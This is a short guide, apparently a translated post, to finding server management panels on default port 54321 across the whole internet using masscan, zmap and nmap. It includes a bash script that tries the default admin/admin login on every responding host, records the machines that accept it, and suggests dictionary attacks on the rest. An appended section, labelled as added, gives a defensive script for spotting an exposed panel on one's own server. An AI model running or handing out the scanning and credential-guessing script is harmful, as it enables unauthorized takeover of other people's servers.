Preparation
- Debian or Ubuntu server
Installation Tools
apt install -y nmap zmap masscan
Rough Scan
masscan
masscan 0.0.0.0/0 -p54321 --banners --exclude 255.255.255.255 -oJ scan.json
zmap
zmap --target-port=54321 --output-file=scan.log
nmap
nmap -sS 0.0.0.0/0 -p 54321 | grep -v failed > scan.log
Weak Password Login
In the early years, some one-click installation scripts for certain UIs set the weak password admin/admin, and many people were too lazy to change it. Servers with the default port 54321 open can therefore be tried one by one.
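#!/bin/bash
# Read every "ip" value out of the masscan JSON output
for ip_ad in $(sed -nE 's/.*"ip": "([^"]+)".*/\1/p' scan.json); do
    # Continue only if the host answers HTTP on port 54321 within one second
    if curl --max-time 1 "http://${ip_ad}:54321"; then
        res=$(curl "http://${ip_ad}:54321/login" --data-raw 'username=admin&password=admin' --compressed --insecure)
        # A response containing "true" is treated as a successful login
        if [[ "$res" =~ .*true.* ]]; then
            echo "$ip_ad" >> week.log
        fi
        # Every host that answered is appended to all.log
        echo "$ip_ad" >> all.log
    fi
done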
week.log contains all the machines that can be logged in to with the weak password; they are quite easy to find by scanning.
all.log lists the machines that have changed their passwords; you can try further dictionary enumeration if interested.
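Seen from the operator's side, the scans above find any panel still listening on the default port 54321 on a public address. The following is an added example, not part of the original post: a check to run on your own server that parses `ss -ltnH` output and flags listeners on that port bound beyond loopback. The function names and the sample lines are constructed for illustration.

```shell
#!/bin/bash
# Added example (not from the original post): flag listeners on the default
# port 54321 that are bound to a non-loopback address.

# audit_listeners [PORT]
# Reads `ss -ltnH` output on stdin, prints a verdict per socket bound to PORT,
# and returns 1 if any of them is reachable beyond loopback.
audit_listeners() {
    awk -v port="${1:-54321}" '
        $1 == "LISTEN" {
            local_addr = $4
            # Split at the last colon so bracketed IPv6 literals stay intact.
            if (!match(local_addr, /:[0-9]+$/)) next
            addr = substr(local_addr, 1, RSTART - 1)
            if (substr(local_addr, RSTART + 1) + 0 != port + 0) next
            sub(/%.*$/, "", addr)    # drop interface scope, e.g. 127.0.0.53%lo
            if (addr ~ /^127\./ || addr == "[::1]" || addr == "::1") {
                print "LOCAL   " local_addr
            } else {
                print "EXPOSED " local_addr
                exposed = 1
            }
        }
        END { exit (exposed ? 1 : 0) }
    '
}

# Constructed sample lines in `ss -ltnH` layout, mixed from several hosts.
sample_ss_output() {
    cat <<'EOF'
LISTEN 0 128  0.0.0.0:22       0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:54321  0.0.0.0:*
LISTEN 0 4096 0.0.0.0:54321    0.0.0.0:*
LISTEN 0 4096 [::]:54321       [::]:*
LISTEN 0 4096 [::1]:54321      [::]:*
EOF
}

# Demo on the sample; on a real host run: ss -ltnH | audit_listeners
sample_ss_output | audit_listeners || echo "panel port reachable beyond loopback"
```

An EXPOSED line means the panel should be rebound to 127.0.0.1 or moved behind a firewall or VPN, with the default port and credentials changed either way.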